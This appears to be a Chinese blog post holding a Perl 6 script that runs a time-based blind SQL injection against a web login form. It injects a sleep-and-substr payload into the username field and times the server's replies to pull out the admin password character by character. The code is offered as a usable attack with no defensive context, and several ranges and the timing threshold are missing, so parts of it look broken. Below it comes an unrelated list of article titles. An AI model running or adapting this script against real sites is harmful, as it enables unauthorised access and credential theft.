perl6 一个猜测密码的注入
2024-09-17 05:49:37
use HTTP::UserAgent; my $ua = HTTP::UserAgent.new;
my $r = HTTP::Request.new;
my $c = HTTP::Cookies.new;
$c.set-cookie('Set-Cookie:JSESSIONID=06617AD9F324C7D49D3218D800B8FBB6');
my $url = 'http://target/login.do';
$r.uri: $url;
$r.set-method: 'POST';
$r.add-cookies($c); $r.header.field(:user-agent<Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/ Firefox/52.0>);
my %data = :loginName<inject>,:password<admin>,:vcode<vzhc>; my @a = ..;
my @swap = 'a'..'z';
@a.append(@swap);
my @password;
for .. {
for @a -> $char {
%data<loginName>="admin' and (\'$char\'!=substr(password,$_,1) or 1=sleep(5)) and ''='";
$r.add-form-data(%data);
my $stime = time;
my $result = $ua.request($r);
my $endtime = time;
my $finish_time = $endtime-$stime;
if ($finish_time >= ) {
say $char;
@password.append($char);
say 'password-> '~@password.join('');
last;
}
}
}
say @password.join('');
最新文章
- 初识Jsp,JavaBean,Servlet以及一个简单mvc模式的登录界面
- IOS网络第二天 - 04-黑酷-GDataXML 解析
- Android Studio-导入External Libraries
- Android OkHttp详解
- MVC LINQ中用封装的TSQL通用更新方法
- Hibernate五 HQL查询
- jQuery之异步Ajax请求使用
- linux终奌站 信息 格式 更改 /etc/bashrc
- Python2与Python3字符编码的区别
- Configuring SSL for SAP Host Agent on UNIX
- html常用标签学习笔记
- BZOJ1889 : Maximal
- 版本控制工具Git的复杂用法的情境分析
- Add和AddRange的使用
- SQL数据查询之——嵌套查询
- mathematica里面清除全部变量
- 将javaweb项目部署到阿里云服务器
- 详解UML图之类图
- cpu几种架构区别
- unity 渲染第一步